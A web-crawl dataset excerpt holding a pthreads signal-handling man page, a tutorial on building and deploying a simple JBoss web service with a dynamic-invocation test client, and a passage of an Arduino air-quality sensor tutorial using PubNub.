text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91
values | source stringclasses 1
value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
Reference Index
Table of Contents
pthread_sigmask, pthread_kill, sigwait - handling of signals in threads
#include <pthread.h>
#include <signal.h>
int pthread_sigmask(int how, const sigset_t *newmask, sigset_t *oldmask);
int pthread_kill(pthread_t thread, int signo);
int sigwait(const sigset_t *set, int *sig);
pthread_sigmask changes the signal mask for the calling thread as described by the how and newmask arguments. If oldmask is not NULL, the previous signal mask is stored in the location pointed to by oldmask..
sigwait is a cancellation point.
On success, 0 is returned. On failure, a non-zero error code is returned.
The pthread_sigmask function returns the following error codes on error:
The pthread_kill function returns the following error codes on error:
The sigwait function never returns an error. | http://www.sourceware.org/pthreads-win32/manual/pthread_kill.html | CC-MAIN-2015-22 | refinedweb | 122 | 56.76 |
12 min read
In this ongoing series, I am putting together a Github Repository Template for my "Go To" front-end tech stack of Next.js, React, TypeScript etc. In this installment of the series, I will get custom environment variables into our Next.js application using .env files. I will also explore how Next.js handles runtime vs build time environment variables.
Just want the Code? View the full changeset covered in this post or check out the 0.0.5 release of the repository.
One of the powerful things about Next.js is that it renders your React components on the server as well as in the browser. This allows you to leverage the servers' processing power and caching to serve up the React content (mostly) the same as if it was rendered only in the browser. Server Rendering also helps with SEO and a host of other things. (See this helpful graphic about the tradeoffs and benefits of server rendering with respect to rendering time).
Additionally, certain backend code can also isolated to only the server - getServerProps, Api Routes, etc. This allows us, to for example, query a database. However, we wouldn't want to expose our database credentials to the browser client. That would be bad. Very bad. The only way to accomplish this was with Next.js was utilizing Runtime Configuration to inject environment variables into your app. However, with the release of Next 9.4, we have a far easier and more universal approach leveraging .env files. In this post, I'll explore the new environment variables support and add some very basic environment variables to my Github Repository Template.
First, I'll create a new file in the project root named
.env and add the following content:
# Base Environment Variables NEXT_PUBLIC_THEME_BACKGROUND="#f6f7f9" NEXT_PUBLIC_THEME_FONT_COLOR="rgba(0, 0, 0, 0.87)" NEXT_PUBLIC_THEME_GREETING_EMOJI="🔥" MY_SECRET="This is top secret"
Restarting the app via
npm run dev I see that Next.js loads the file (without having to install any other packages - thanks Next.js!):
These variables are now available on
process.env inside the Next.js application. Only variables that start with
NEXT_PUBLIC will be available on the browser client. All variables will be available on server code.
To illustrate consuming public environment variables, I'm going to introduce some basic styling to the application. In the next part of the series, I'll leverage these variables for Material-UI themes.
Start by creating a file in the /pages directory called _document.tsx with the following content:
// /pages/_document.tsx import React from 'react'; import Document, { Head, Main, NextScript, } from 'next/document';> ); } } export default MyDocument;
Next.js allows you to override the base html template using the _document.tsx file (learn more). For the purpose of this tutorial, I'm just going to add a style tag to leverage the environment variables. Restart the application with
npm run dev I see the following (note the background and font color change):
Now, technically, the _document.tsx is only rendered on the server, so I'll update
src/screens/IndexContent.tsx to control the emoji to ensure the variable is read on the client as well.
import React from 'react'; interface IndexProps { greeting: string } const IndexContent: React.FC<IndexProps> = (props) => { const { greeting } = props; return ( <div> <h1> {greeting} {process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI} ! </h1> </div> ); }; export default IndexContent;
Reload the page, I see the following (note the 🔥 emoji vs the 👋):
I have now illustrated that environment variables starting with NEXT_PUBLIC are available on the server and the client.
One feature of .env files I liked about Create React App is that you could actually have a hierarchy of .env files. The actual .env file could provide an exhaustive set of defaulted environment variables. Then a .env.local file could be used to provide values specific to the environment. This is a great way to support 12 Factor applications. In production environments, I can simply include an environment specific .env.local that could, for example, contain the production database credentials, etc. Next.js supports this as well!
To illustrate this hierarchy, I will create a .env.local file in the project root with the following content.
# Local Environment Variables NEXT_PUBLIC_THEME_GREETING_EMOJI="🍊" MY_SECRET="Extra Super Secret"
Now, restarting the server via
npm run dev I see:
Note: The
process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI variable took on the overridden value from within .env.local and that the other public THEME variables retained their value from the .env defaults. Neat!
Note: This hierarchy optionally goes further with .env.development and .env.production (corresponding to the value of
NODE_ENV). I do not utilize this much so I won't include it in my Github Repo Template, but you can read more about it here.
Note: You should never commit passwords, API keys, and other secrets into Github. If you adopt this default approach, ensure that your
.env.local file is added to your .gitignore file. If you use the .env file for defaults and do not include any secrets, you can check that in to source code. Just be sure to remove it from .gitignore if it is present.
Next, I want to confirm that environment variables that do not start with NEXT_PUBLIC are only available on the server.
To illustrate this, I'll add some logging and leverage Next.js's getServerSideProps in /pages/index.tsx. Note: We cannot use getServerSideProps AND getStaticProps in the same page component, so I have removed the later.
import React from 'react'; import { NextPage, GetServerSidePropsContext, GetServerSidePropsResult, } from 'next'; import IndexContent from '~/screens/IndexContent'; interface IndexProps { greeting: string } const IndexPage:NextPage<IndexProps> = (props: IndexProps) => { const { greeting } = props; console.log(`Inside IndexPage Render component. Browser: ${!!process.browser}`); console.log(process.env.MY_SECRET); console.log(process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI); return ( <IndexContent greeting={greeting} /> ); }; export async function getServerSideProps(context: GetServerSidePropsContext): Promise<GetServerSidePropsResult<IndexProps>> { console.log(`Inside getServerSideProps. Browser: ${!!process.browser}`); console.log(process.env.MY_SECRET); console.log(process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI); return { props: { greeting: 'Hello From The Server' }, // will be passed to the page component as props }; } export default IndexPage;
The above will log out MY_SECRET and NEXT_PUBLIC_THEME_GREETING_EMOJI as well as tell me if we're running in the browser or server.
Reloading this page, the server outputs:
Whereas the client outputs:
As we can see, MY_SECRET is available to the IndexPage component when the page is rendered on the server, but not when rendered on the client. Also, note that MY_SECRET is available inside of getServerSideProps which is never run on the client.
As we saw in the previous example, MY_SECRET is technically available inside of the IndexPage component when rendered on the server. However, you should not attempt to directly use it in your component for rendering purposes. Since MY_SECRET will not be available on the client when it renders, React will trigger a Content did not match error because the client and the server will render different output. Also, through this error, you may leak your secrets meant only for the server.
To illustrate this error case, I can pass process.env.MY_SECRET as the value of the greeting prop of IndexContent.
// /pages/index.tsx ... return ( <IndexContent greeting={process.env.MY_SECRET || ''} /> ); ...
In the browser, this will produce:
Additionally, I get the content mismatch error between the client and the server.
Note: That the value of MY_SECRET is exposed because it is part of the server output. Thus anyone viewing the page can look at the server rendered response and see our secret. Do not do this. If an environment variable does not start with NEXT_PUBLIC, only use it in server specific contexts like getServerProps, apiRoutes, etc.
For extra confidence, if I do a production build of the application, I want to check the bundles for the values of the environment variables.
rm -rf .next && npm run build
Notice the console message that .env and .env.local are being read at build time. This is potentially worrisome.
Now I'll search the production build bundles for the values of private and public environment variables:
Searching for the value of MY_SECRET:
grep -rn "Extra Super Secret" .next/
This yields nothing, whereas searching for the value of NEXT_PUBLIC_THEME_GREETING_EMOJI
grep -rn "🍊" .next/ .next//server/static/1gu-CLKzeq3pp_TQegMjc/pages/index.js:126: return __jsx("div", null, __jsx("h1", null, greeting, "🍊", "!")); .next//server/static/1gu-CLKzeq3pp_TQegMjc/pages/index.js:141: console.log("🍊"); .next//server/static/1gu-CLKzeq3pp_TQegMjc/pages/index.js:150: console.log("🍊");
As we can see, our secret environment variable is not exposed in the build bundle, whereas our public one is completely replaced, even on the server. This means, public environment variables are interpolated at buildtime and private environment variables are read at runtime. Private variables never get bundled. However, this also means that public environment variables cannot be changed without running a whole new build. This may not be ideal in certain CI/CD cases when we want to create a single build and deploy to different environments (QA, Staging, etc) with different environment variables. Let's see if we can achieve runtime interpolation of public variables similar to that of private environment variables.
We will leverage Next.js Runtime configuration to achieve this. Note: As stated before, in earlier versions of Next.js, the only way to work with Environment Variables was to leverage Runtime Configuration. This required, a separate dotenv loader dependency to work with the .env files. It worked, but was cumbersome. Now we can use it for what it was designed to do.
First, I'll create a
next.config.js file in the project root with the following contents:
// /next.config.js module.exports = { serverRuntimeConfig: {}, publicRuntimeConfig: { // Will be available on both server and client greeting_emoji: process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI, }, };
Next I'll update the IndexContent component to utilize the publicRuntimeConfig rather than consume the environment variable directly.
import React from 'react'; import getConfig from 'next/config'; const { publicRuntimeConfig } = getConfig(); interface IndexProps { greeting: string } const IndexContent: React.FC<IndexProps> = (props) => { const { greeting } = props; console.log(publicRuntimeConfig); // Note: This console log return ( <div> <h1> {greeting} {publicRuntimeConfig.greeting_emoji} ! </h1> </div> ); }; export default IndexContent;
As a reminder, the contents of .env.local are:
# Local Environment Variables NEXT_PUBLIC_THEME_GREETING_EMOJI="🍊" MY_SECRET="Extra Super Secret"
Next I'll do a production build via
npm run build and search again for the values of the Environment Vars:
grep -rn "Extra Super Secret" .next/
Still nothing. Perfect.
grep -rn "🍊" .next/
We have a few comment results that still directly use the Env Var but we also have:
"runtimeConfig":{"greeting_emoji":"🍊"}, ...
This is the runtimeConfig. As per before, the Environment Variable is interpolated at build. However, the 🍊 value here is simply the initial state.
If we run the production build, we will see:
Finally, I'll update the
.env.local file with some new content to show that build time values are overwritten at runtime:
# Local Environment Variables NEXT_PUBLIC_THEME_GREETING_EMOJI="🍍" MY_SECRET="DEPLOY TIME SECRET"
Finally, without creating a new build, I simply start the production build again via
npm start. Reloading the browser, I see:
On the backend, I see:
Note: The 🍊 is from console logging process.env.NEXT_PUBLIC_THEME_GREETING_EMOJI which was interpolated at build time. The 🍍, however is from console logging the publicRuntimeConfig which is evaluated at runtime. Also, note MY_SECRET has the value of "DEPLOY TIME SECRET". Try changing the values for both of these variables in .env.local and restart to see them change without building. It is slick.
So, did we learn?
Now that we have figured out Next.js's new approach to environment variables, we'll include this in our Github Repository Template project. View the full changeset covered in this post or check out the 0.0.5 release of the repository.
In the next part of this series, I will introduce Material-UI.
What approach do you take to securely store your .env (or .env.local) files for QA and Production environments?
Image Credit: Photo by Polina Tankilevitch from Pexels | https://hashnode.blainegarrett.com/building-a-github-repo-template-part-5-nextjs-environment-variables-ckcqnl1m2004gpms11f533syq?guid=none&deviceId=9669fee4-5b91-4fb3-aa6d-69d4eb76b1e4 | CC-MAIN-2020-34 | refinedweb | 1,969 | 50.12 |
On Tue, Mar 29, 2011 at 10:46:59PM +0800,, > Heh I forgot to make an rpm before pushing and this broke, the following is needed to package the iohelper introduced in commit e886237af5df963a07cb7c03119b4eaea540f0e9 Since that doesn't seems comiled conditionally that looks safe: diff --git a/libvirt.spec.in b/libvirt.spec.in index b6b96aa..7dcbe8f 100644 --- a/libvirt.spec.in +++ b/libvirt.spec.in @@ -984,6 +984,7 @@ fi %endif %attr(0755, root, root) %{_libexecdir}/libvirt_parthelper +%attr(0755, root, root) %{_libexecdir}/libvirt_iohelper %attr(0755, root, root) %{_sbindir}/libvirtd %{_mandir}/man8/libvirtd.8* Daniel -- Daniel Veillard | libxml Gnome XML XSLT toolkit daniel veillard com | Rpmfind RPM search engine | virtualization library | https://www.redhat.com/archives/libvir-list/2011-March/msg01401.html | CC-MAIN-2014-15 | refinedweb | 111 | 54.42 |
A while back, I was assigned to work on a project on which I needed to create a simple web service that would run in JBoss App Server. As I searched the web for some detailed tutorials, I didn't find any detailed tutorial that could help me. Eventually I figured out all the pieces I had the design and implement in order to get such a web service working. I decided to summarize the things I learned in this article, not only for my own record keeping purpose, but also helping others who needed similar information.
The intention of this article is to provide a detailed tutorial on the following topics:
I hope readers will enjoy this article! If you have any questions of comments, please leave it in the FAQ section.
While I was searching for detailed tutorials, I received great help from this guide. The shortcoming of this guide was the lack of certain details. It may be very obvious to some advance developers, without these details a lot of beginners can get confused. This article attempts to fill these gaps. I recommend readers also review this guide after reading my article.
This tutorial requires setup and configuration of the following software packages:
I also recommend the use of Eclipse IDE. But, for this tutorial, all work can be done using a simple code editor (like UltraEdit32, Crimson Editor, or Notepad++), Command Prompt, and Apache Ant.
For my own convenience, this tutorial was created on Windows XP. And it should be relative easy to be migrated to other platforms.
Install JDK on Windows XP is super easy, just download the MSI installer, then install it either default to "Program Files" or directly to "C:\". After installing JDK, it is recommended to configure the system variables:
After configuring the system variable, open a Command Prompt and type "java -version". The output will indicate the version of JDK installed in the system. This should help verify the success of JDK installation. After the verification, close the Command Prompt.
Install Apache Ant is also easy, download the binary executable archive file from the Apache Ant Project web page (here). Then unzip the archive file to "C:\". This will unpack the archive file to "C:\apache-ant-1.7.1". "C:\apache-ant-1.7.1" will be the base directory of Apache Ant. After the unpacking, also configure the system variables as following:
After configuring the system variable, perform verification by opening a Command Prompt and type "ant -version". If configuration is correctly done, the output will indicate the version of Apache Ant installed in the system.
This tutorial teaches how to create web service that runs in JBoss. So installing and configuring JBoss Application Server (current version 5.0.0.GA) and JBoss Web Services (also refer as JBossWS, current version 3.0.5.GA) is also required. You can find the install packages (zip archives) in these two locations:
The process of installing JBoss is similar to installing Apache Ant.". Although optional, you can also add "%JBOSS_HOME%\bin" to the system variable "PATH".
The last step is to install JBossWS package. The steps are as following:
Now we are ready to create a simple web service. There are two ways to create web services:
In this tutorial, the approach will be discussed is the bottom up approach, because this is the easiest way to create a web service. The source codes can be found in the downloads section. The steps will be discussed in the following sub-sections.
This tutorial uses Eclipse IDE and Apache Ant for building the sample project. Creating this sample project is no different from creating a simple Java HelloWorld project. After getting the sample source code, you can see that in the base directory "webservice", there are two folders:
First, let's take a look at the source file "Greeting.java". The entire source code looks like this:
package tutorial.hanbo.webservice;
import javax.jws.WebService;
import javax.jws.WebMethod;
@WebService
public class Greeting
{
@WebMethod
public String greetClient(String userName)
{
return "Greeting " + userName + "! Have a nice day...";
}
}
If the reference libraries are not added to this project, the project won't compile in Eclipse. So take a look at the .classpath file and see all the needed reference libraries (i.e. the referencing jar files). These libraries were part of the JBoss package. They can be found in 3 different folders:
A web service has to be deployed in order for the client access. In this tutorial, the web service will be packaged as a war file and deployed as a servlet. The war file contains a deployment descriptor, a file named "web.xml" specifies the URL.Servlet mapping. When a request is sent to JBoss App Server, JBoss will route the request to specific servlet based on the URL/Servlet mapping specified in the web.xml files.
In the project's base directory, you can locate the web.xml file in src/resources sub directory. The content of this file looks like this:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"">
<web>
The content of this descriptor file can be easily understood. The entire content has two parts:
Next section will describe how to package the war file.
Packaging the war file can be done with Apache Ant. In the build.xml, you can find a number of targets. They are used to perform build actions. One of the targets has the name of "packaging". This is the target used to create a war file for deployment, as shown following:
<target name="packaging" >
<war destfile="bin/greeting.war" webxml="src/resources/web.xml">
<classes dir="bin/classes"/>
</war>
</target>
In this target section, there is only one action to perform -- to build a war file using a task named "war". This task takes three parameters:
> ant packaging
Buildfile: build.xml
packaging:
[war] Building war: %project_base_directry%\bin\greeting.war
BUILD SUCCESSFUL
Total time: 1 second
Since the war file has been successfully built, it is time for deployment.
Before attempting to deploy the sample war file into JBoss App Server, you must first start the JBoss App Server. Since we are just using JBoss as a mean to testing a simple web service, this tutorial will not discuss how to run JBoss was a service. Instead, we will open another Command Prompt, then start the JBoss App Server in this newly opened Command Prompt.
To start the JBoss App Server, use the newly opened Command Prompt to navigate to "C:\jboss-5.0.0.GA\bin", then run the start up script "run.bat". After JBoss App Server starts up, you have to wait for a while until the Command Prompt shows output like this:
15:34:41,889 INFO [ServerImpl] JBoss (Microcontainer)
[5.0.0.GA (build: SVNTag=JBoss_5_0_0_GA date=200812041714)] Started in 5m:3s:150ms
To shut down JBoss App Server, activate the Command Prompt that runs the JBoss App Server. Press Ctrl+C to halt the execution, then close the Command Prompt.
To deploy the war file, all you need to do is copying the war file (greeting.war), then paste it in "C:\jboss-5.0.0.GA\server\default\deploy". After taking this step, you will notice the Command Prompt in which the JBoss App Server is running will output the deployment progress like this:
15:35:21,422 INFO [DefaultEndpointRegistry] register: jboss.ws:context=greeting,endpoint=GreetingWebService
15:35:22,453 INFO [TomcatDeployment] deploy, ctxPath=/greeting, vfsUrl=greeting.war
15:35:28,172 INFO [WSDLFilePublisher] WSDL published to:
file:/C:/jboss-5.0.0.GA/server/default/data/wsdl/greeting.war/GreetingService4604908665079984702.wsdl
The next step is to test the deployment. Open a browser window, then navigate to "". After the page loads up, you should be able to see section "Registered Service Endpoints" listing the detail info on the deployment of web service "GreetingWebService". Another test you can try is to see the WSDL file generated dynamically by JBossWS. For this tutorial, the link to the generated WSDL is "". It can be viewed by using the same browser window.
Undeploy the web service can be done by simply deleting the war file (greeting.war) in "C:\jboss-5.0.0.GA\server\default\deploy". Once you've done that, the Command Prompt will show the progress of undeployment:
16:51:12,229 INFO [TomcatDeployment] undeploy, ctxPath=/greeting, vfsUrl=greeting.war
16:51:13,307 INFO [DefaultEndpointRegistry] remove: jboss.ws:context=greeting,endpoint=GreetingWebService
In build.xml, two targets are provided to deploy or undeploy the web service. They are simply using Apache Ant's copy file and delete file tasks to accomplish deploy and undeploy operations. To deploy web service, use target "deploy". To undeploy web service, use target "undeploy".
If you don't test the newly created web service, you won't be able to know whether or not it is working. Since in this tutorial, the web service is extremely simple, only exposing one web method that takes a string as parameter, testing it can be done via dynamic invocation. Dynamic invocation is, as many others has remarked, "a nasty way of creating a web service client". Most of the web services in the real world utilize complicated data objects and performs complex operations. Using dynamic invocation to create code to exercise such complex web services can be extremely difficult. It is better to create web service clients by using proxy classes generated by JBossWS from WSDL and associated XSD files.
The web service client is simply a console application written in Java. I have separated this test application into a different project, called "webservice-test". This project uses the same set of reference jars as the web service project. A build.xml is provided not only for building the project on command line, but also for running the test application. To build the project, use command "ant compile". After building the project, to the test application, use command "ant run-test-app". But, before running this test app, be sure to deploy the sample web service first.
Let's take a look at the source code of the test application. The two main sections of the source code are:
import javax.xml.rpc.Call;
import javax.xml.rpc.Service;
import javax.xml.rpc.ServiceFactory;
import javax.xml.rpc.ParameterMode;
import javax.xml.namespace.QName;
ServiceFactory
Service
call
Call
ParameterMode
QName
The following code will invoke the sample web service:
public static void main(String[] argv)
{
try
{
String NS_XSD
= "";
ServiceFactory factory
= ServiceFactory.newInstance();
Service service = factory.createService(
new QName(
"",
"GreetingService"
)
);
Call call = service.createCall(new QName(
"",
"GreetingPort"
));
call.setTargetEndpointAddress(
""
);
call.setOperationName(
new QName(
"",
"greetClient"
)
);
QName QNAME_TYPE_STRING =
new QName(NS_XSD, "string");
call.setReturnType(QNAME_TYPE_STRING);
call.addParameter(
"arg0", QNAME_TYPE_STRING,
ParameterMode.IN
);
String[] params = { "Murphy Brown" };
String result = (String)call.invoke(params);
System.out.println(result);
}
catch (Exception e)
{
e.printStackTrace();
}
}
createService()
createCall()
setTargetEndPointAddress()
setOperationName()
setReturnType()
addParameter()
invoke()
> ant run-test-app
> ant run-test-app
Buildfile: build.xml
run-test-app:
[java] Greeting Murphy Brown! Have a nice day...
BUILD SUCCESSFUL
Total time: 8 seconds
There you go. This is how a simplest web service is created, deployed, and tested. I know in its current form, the web service provides no use at all. I like to think this tutorial provides a skeleton of a web service. Any reader can use it as a start point; add more features, deploy and test; then add more feature, deploy and test again, until the final product can fulfill real users' needs.
I hope you enjoy this article as much as I enjoyed writing it.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
web.xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app xmlns=""
xmlns:xsi=""
xsi:schemaLocation=""
version="2>
wsconsume.sh -k
.sh
output
.java
.class
tutorial/hanbo/webservice/
GreetingClient.java
package tutorial.hanbo.webservice;
import tutorial.hanbo.webservice.*;
public class GreetingClient
{
public static void main(String args[])
{
GreetingService service = new GreetingService();
Greeting greeting = service.getGreetingPort();
System.out.println("Server said: " + greeting.greetClient("Murphy Brown"));
}
}
javac tutorial/hanbo/webservice/GreetingClient.java
wsrunclient.sh tutorial.hanbo.webservice.GreetingClient
log4j:WARN No appenders could be found for logger (org.jboss.ws.metadata.builder.jaxws.JAXWSWebServiceMetaDataBuilder).
log4j:WARN Please initialize the log4j system properly.
Server said: Greeting Murphy Brown! Have a nice day...
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/script/Articles/View.aspx?aid=33094 | CC-MAIN-2014-35 | refinedweb | 2,106 | 58.79 |
std::ellint_2, std::ellint_2f, std::ellint_2l
kand
φ.
Promotedis also long double, otherwise the return type is always double.
[edit] Parameters
[edit] Return value
If no errors occur, value of the incomplete elliptic integral of the second kind of
k and
φ, that is ∫φ
0√1-k2
sin2
θdθ,
#include <cmath> #include <iostream> int main() { double hpi = std::acos(-1)/2; std::cout << "E(0,π/2) = " << std::ellint_2(0, hpi) << '\n' << "E(0,-π/2) = " << std::ellint_2(0, -hpi) << '\n' << "π/2 = " << hpi << '\n' << "E(0.7,0) = " << std::ellint_2(0.7, 0) << '\n' << "E(1,π/2) = " << std::ellint_2(1, hpi) << '\n'; }
Output:
F(0,π/2) = 1.5708 F(0,-π/2) = -1.5708 π/2 = 1.5708 F(0.7,0) = 0 E(1,π/2) = 1
[edit] External links
Weisstein, Eric W. "Elliptic Integral of the Second Kind." From MathWorld--A Wolfram Web Resource. | https://en.cppreference.com/w/cpp/numeric/special_math/ellint_2 | CC-MAIN-2018-43 | refinedweb | 150 | 68.47 |
- random access
- how do i print a colored rectangle?!?!
- String Copying problems.
- Program help
- Help with Fraction class
- C++ Question?
- convert string to ASCII value
- C++ Question
- what is wrong?
- Can someone review?
- Erase what you just printed in a while loop
- Does anyone know how to do this?
- I'm having trouble passing variables with pointers
- Winsock, CAsyncSocket Derivative.
- writing a gaussian blur filter
- Sending raw packets.
- strcmp
- dangling reference
- dynamic memory alloc. for array elements
- searching for a specific item in a C++ file
- Debugger?
- C++ file access
- color cout..
- String/Data Manipulation
- ! Master C++ programmer
- Library file problems
- Watcom C++ inline assembler
- IRC help channel?
- Linking error....
- eof in fstream & singly linked lists
- help plz plz
- visual c++ project!!
- Sort indexes of frequency array?
- Another newbie question
- Calulating Elapsed Time of any EXE
- simple question
- declare consts~
- Registry Manipulation in C++
- Help!! How to return a pointer to beginning of string??
- namespace question
- MSVC++ Error... Nooo...
- where or how could i add a string?
- Resource Editor to use with Dev C++
- compliers
- Does this look okay? Any changes?
- DirectX surface question
- Databases
- debugging problem
- Pointer problem
- toggle caps lock on or off | http://cboard.cprogramming.com/sitemap/f-3-p-880.html | CC-MAIN-2015-06 | refinedweb | 195 | 61.63 |
duplocale - duplicate a locale object
The.
Upon successful completion, the duplocale() function shall return a handle for a new locale object. Otherwise, duplocale() shall return (locale_t)0 and set errno to indicate the error.
The duplocale() function shall fail if:
- [ENOMEM]
- There is not enough memory available to create the locale object or load the locale data.; }
The().
None.
None.
freelocale, newlocale, uselocale
XBD <locale.h>
First released in Issue 7.
POSIX.1-2008, Technical Corrigendum 1, XSH/TC1-2008/0077 [283,301], XSH/TC1-2008/0078 [283], and XSH/TC1-2008/0079 [301] are applied.
POSIX.1-2008, Technical Corrigendum 2, XSH/TC2-2008/0084 [753] is applied.
return to top of pagereturn to top of page | https://pubs.opengroup.org/onlinepubs/9699919799/functions/duplocale.html | CC-MAIN-2019-47 | refinedweb | 118 | 60.31 |
If 2018 had taught us anything, it’s no place on Earth is free of natural disaster. With the multiple California wildfires throughout the year, surrounding cities experienced heavy air pollution.
The World Health Organization estimates that 4.6 million people die each year from causes directly attributable to air pollution. With that in mind, even being aware of air particulates and toxins wage a difficult battle. Many people often don’t realize that their towns, let alone their own homes, could be filled with tainted air.
However, in this day and age of powerful IoT technologies, any person can combat bad air quality. Sensors and microcontrollers have gotten so cheap, so small, and so simple to implement, that practically anyone can install any type of monitor or sensor in their very own home. Among other possibilities, these sensors can trigger things like alerts and notifications to spur user action.
In this tutorial, we’ll show you how easy it is to create an air quality sensor and monitor using a few low-cost electronics and PubNub Functions. The sensor will extract air quality information with multiple sensors, graph that data in real time, and even set off a speaker alarm if the air quality reaches a harmful critical point.
What You’ll Need
- Arduino Uno
- Breadboard & Wires
- Basic Speaker
- MQ-2 Smoke Detecting Sensor
- MQ-7 Carbon Monoxide Co Gas Sensor
- Air Quality Sensor Hazardous Gas Detection Module
- DHT11 Temperature and Humidity Sensor
Hardware
Arduino Uno
Arduino Uno is one of the cheapest and most popular microcontrollers available today. Since the Uno has an onboard analog-to-digital converter, the analog signals produced from our sensors can be properly read. Other popular microcontrollers do not have this feature, so that’s why we chose the Uno for this project.
BreadBoard
A breadboard is a tool used to prototype and test circuits. Breadboards have two long rails (red rail for power and blue rail for ground) on each of its sides that are each connected vertically down the board. This is where engineers typically plug in a power supply and ground so that the whole rail can be easily used as a power and ground connection. At the center of the board, there are groups of 5-holed horizontal lines. Each of these lines is horizontally connected (5-hole connection) which are used for the circuit itself. You can even connect one grouping to another to make a 10-hole connection and so on and so forth.
Basic Speaker
You know what a speaker is. But here’s some fun cocktail party knowledge: a speaker is essentially a piece of vibrating metal that moves up by a magnet when fed power and falls down when unpowered. When the magnet is turned on and off at a specific frequency, a tone can be played. You won’t need to know much about how to code one of these, but it’s always nice to know!
Sensors
Each of the sensors we’re going to use operate on the same fundamental principle. A specific type of material is placed inside a sensor and an electric current is fed through it. When certain environmental conditions occur that react with the sensor’s specific material, the material’s resistance to the current increases or decreases. Thus the current will be affected and the sensor can then translate that change into proper sensor units.
Wiring
The wiring of each of these sensors follows the same pattern: connect ground pin of the sensor to the ground of the Arduino, connect the power pin of the sensor to the 5.5V pin of the Arduino, and connect the data pin of the sensor to a GPIO pin on the Arduino.
You can connect the sensors exactly as we did by following the diagrams exactly.
The Code
Our code will follow three parts: Arduino sketch, publishing code, and graphing HTML code.
- The Arduino sketch will handle the direct communication between the sensors and the Arduino.
- The publishing code will relay the data received by the Arduino to the PubNub SDK for publishing.
- The HTML code will then visualize the data into a graph in real time on an HTML webpage.
Before you start, make sure you sign up for a free PubNub account. You’ll need your unique publish/subscribe keys to stream your data in real time.
Feel free to reference this project’s GitHub repository for more information!
Arduino Sketch
For the Arduino code, we will be programming in the Arduino IDE in order to utilize its serial bus capabilities and simple method call structure.
First and foremost, we must import all of the necessary libraries for each of our sensors so that we can communicate with them in the Arduino IDE.
To do this, download the .zip file from each library’s GitHub and add them to your Sketch. Then include them like so.
GitHub links: DHT11, MQ135, MQ7, MQ2
#include <dht.h> #include <MQ135.h> #include <MQ7.h> #include <MQ2.h>
Then you will need to create variables and instances for each of your sensors.
DHT11 #define DHT11_PIN 16 //place this line below the include statements //DHT int chk; dht DHT; //MQ135 float M135; MQ135 gasSensor = MQ135(A3); //MQ2 int pin = A0; MQ2 mq2(pin); //MQ7 float ppm; MQ7 mq7(A1, 5.0);
Next, you will need to create a setup function to initialize your Arduino’s baud rate as well as initiate any sensor’s necessary setup modules (in our case the MQ2).
void setup() { Serial.begin(9600); mq2.begin(); }
To keep our program continuously running, create a loop method with a delay of 1 second.
void loop() { //rest of the code delay(1000) }
Inside the loop is where we will write the code to communicate with the sensor’s data. For each sensor, we essentially use the methods defined in their libraries to extract the data from the sensor and format the raw voltage reading to a recognizable unit of measure.
The code for each sensor is as follows:
MQ7 = analogRead(A1); ppm = mq7.getPPM(); //Serial.print(" MQ7 = "); //Serial.println(ppm,1); //----------------------------------- M135 = gasSensor.getPPM(); //Serial.print(" MQ135 = "); //Serial.println(M135,1); //----------------------------------- //MQ2 float lpg = mq2.readLPG(); float smoke = mq2.readSmoke(); //Serial.print(" lpg = "); //Serial.print(lpg,1); //Serial.print(" Smoke = "); //Serial.println(smoke,1); //----------------------------------- //DHT11 chk = DHT.read11(DHT11_PIN); if(DHT.temperature > -500) //don’t read any absurd readings { //Serial.print("Temperature = "); Serial.println(DHT.temperature); } if(DHT.humidity > -500) //don’t read any absurd readings { //Serial.print("Humidity = "); Serial.println(DHT.humidity); }
Note: We are going to comment out the serial.print lines except for the temperature and humidity. This makes future steps simpler. But if you’d like to test your devices, uncomment them. You can view the serial prints in the Arduino serial monitor. Just make sure that each sensor is publishing to a new line each time.
Lastly, we are going to program in our speaker. As discussed before, we must program the speaker to operate at a certain frequency to play a specific tone. We can easily do this by coding a pitches.h file.
Create a new file named pitches.h and paste the contents of this file in. At the top of your file, include the pitches.h file:
#include "pitches.h"
Next, copy and paste these methods that are responsible for playing a little jingle using the tone reference we created in the pitches.h file.
int melody[] = {NOTE_C4, NOTE_G3, NOTE_G3, NOTE_A3, NOTE_G3, 0, NOTE_B3, NOTE_C4}; // note durations: 4 = quarter note, 8 = eighth note, etc.: int noteDurations[] = {4, 8, 8, 4, 4, 4, 4, 4}; void playTones() { //); } }
Now we can have the jingle trigger if any of our sensor values reach above a certain threshold. You will need to create your own critical variables through trial and error as each sensor (at this price range) will come with a noticeable margin of error.
if((lg > lg_crit) || (smoke > smoke_crit) || (ppm > ppm_crit) || (DHT.temperature > temp_crit) || (DHT.humidity > hum_crit) || (M135 > M135_crit)) { playTones(); }
After you’re done writing the Arduino code, select your Arduino’s USB port, hit the green checkmark to compile, and the green right arrow to upload it to your connected Arduino.
Tip: You can find the name of the port your Arduino is connected to by going into the top menu: Tools->Port
The finished product should look like this:
Publishing Code
Now at this point, you may be wondering, why do we need separate code just to publish messages from our Arduino? Can’t we just do it straight from the sketch?
To simplify a complicated answer, the PubNub Arduino SDK requires the use of a WIFI shield to enable Internet capabilities. Since that is out of the scope of this project, we will revert to an alternative method: PySerial.
PySerial is a library that tunes in on the Arduino’s serial monitor. Anything printed over the serial monitor can be read by PySerial. Thus, we can extract the data from the serial bus and publish that data through PubNub.
To install Pyserial, type this command into your terminal:
pip install pyserial
Then create a python script and include these libraries (assuming you already created a PubNub account).
import serial from pubnub.callbacks import SubscribeCallback from pubnub.enums import PNStatusCategory from pubnub.pnconfiguration import PNConfiguration from pubnub.pubnub import PubNub from time import sleep pnconfig = PNConfiguration()
